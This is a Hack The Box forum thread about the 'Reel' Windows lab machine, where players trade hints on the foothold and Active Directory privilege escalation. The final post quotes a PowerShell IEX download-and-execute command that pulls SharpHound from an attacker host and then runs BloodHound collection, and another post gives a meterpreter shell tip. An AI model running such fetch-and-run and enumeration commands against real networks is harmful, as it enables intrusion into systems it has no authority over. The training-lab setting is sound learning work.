Reel

Comments

  • Got user. Loving this machine so far!

    Arrexel

  • Already got user.
    I was just wondering if someone was able to get user without using ms?

    Hack The Box

    OSCE | OSCP | CRTE | GPEN | eCPTX | CREST CRT | GDAT | eCPPTv2 | GWAPT | OSWP | ECSA (Practical)

  • Was busy with OSCP, but had a moment to do this and it was elaborate!

    cslatt05

  • edited October 2018

    Failed many times to get a proper payload and finally got user!
    And now stuck with priv esc user t**.
    I'm new with Windows, but this is an interesting box; any help with priv esc appreciated :)

  • Got ROOT! yeah!
    One of the best machines. Learned a lot about the Windows way of "rule them all". Breaking head through the wall, trying to use PowerShell, because forget about initial nmap results. I'll get it another one time a week later after reading some articles from blackhat 17, to remember everything better. Thank you @egre55

  • Hi all... I have user, and I know where to go next, but am having some trouble getting there... I don't know if it's meterpreter or what, but my PS commands seem to run without response. Would appreciate a nudge in the right direction.

  • Init foothold: I'm trying to send a file, based on the tips on the machine, to a user, but I don't get anything back. Is this the intended way?

  • edited November 2018

    I am soooooo close on this. I can see the file I want, but I can't open it, copy it, move it or change its properties... What am I missing?

    Edit: Nevermind! I'm a fool. I need to slow down and read a little more carefully.

    Got root! Great box!

  • powershell issue is solved by issuing "powershell -c -" in meterpreter > shell

  • Awesome machine.
    Incredibly realistic too.

  • Where to start? Downloaded some files and what's the next step? PM plz

  • Got root! If you want to learn a lot about Windows AD PrivEsc this is your machine!

    laed2

  • Very sad to see that this box is retiring this weekend.

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter so my DMs are always open.

  • This system is a crazy walk down AD road. Learned loads.

  • edited November 2018
    <<< redacted - rooted!!! >>>
  • @rireoubli said:
    Yay, finally got root on this one as well! It was a very good one, thanks to the creator.

    And I'd like to share the hint that made it for me when I was stuck for so long: login-logout might help you

    Thank you, thank you, thank you.

  • edited November 2018

    <<< redacted - rooted!!! >>>

  • @evandrix said:
    stuck on #reel @ user c****e, what next?
    1. need to re-run "dog" tool, or output already there is sufficient to PE?
    2. PE to local admin sufficient, or must be da?
    3. maybe my ps1 syntax is wrong, if someone can help (in a pm probably), that would be great

    You don't need to re-run anything. The document you have is enough.

    This is a useful read: https://wald0.com/?p=112

    TazWake

  • edited November 2018

    <<< redacted - rooted!!! >>>

  • @evandrix said:
    Yep, I've read through that.
    It seems like the "document you have" != the output of my live ps1 queries via p****v**w

    Possibly, but if you've logged in as the user C*, did you enumerate the user T* account first?

    TazWake

  • edited November 2018

    Rooted thanks to a hint to stop being a dummy. I'm sad to see this one go into retirement.

    This was a great box and representative of cracking the perimeter into a real world environment. I definitely added some cool techniques and tools into my arsenal thanks to this challenge.

    If any HTB users have helped you with a challenge or hint please consider giving them +respect on their profile.
    Here is mine if you would like to do so.
    https://www.hackthebox.eu/home/users/profile/50326

  • edited November 2018
    <<< redacted - rooted!!! >>>
  • edited November 2018

    <<< redacted - rooted!!! >>>

  • @whipped said:

    @rireoubli said:
    Yay, finally got root on this one as well! It was a very good one, thanks to the creator.

    And I'd like to share the hint that made it for me when I was stuck for so long: login-logout might help you

    Thank you, thank you, thank you.

    Thank you, thank you, thank you, Thank you, thank you, thank you.

  • Hey all,
    I know that this machine is old; this is just for the sake of education.

    I have reached the part where I download SharpHound.ps1 on the victim using
    IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/SharpHound.ps1')

    Then when I run
    Invoke-BloodHound -CollectionMethod All

    the shell hangs and nothing happens.

    Any help on what may be causing the problem?
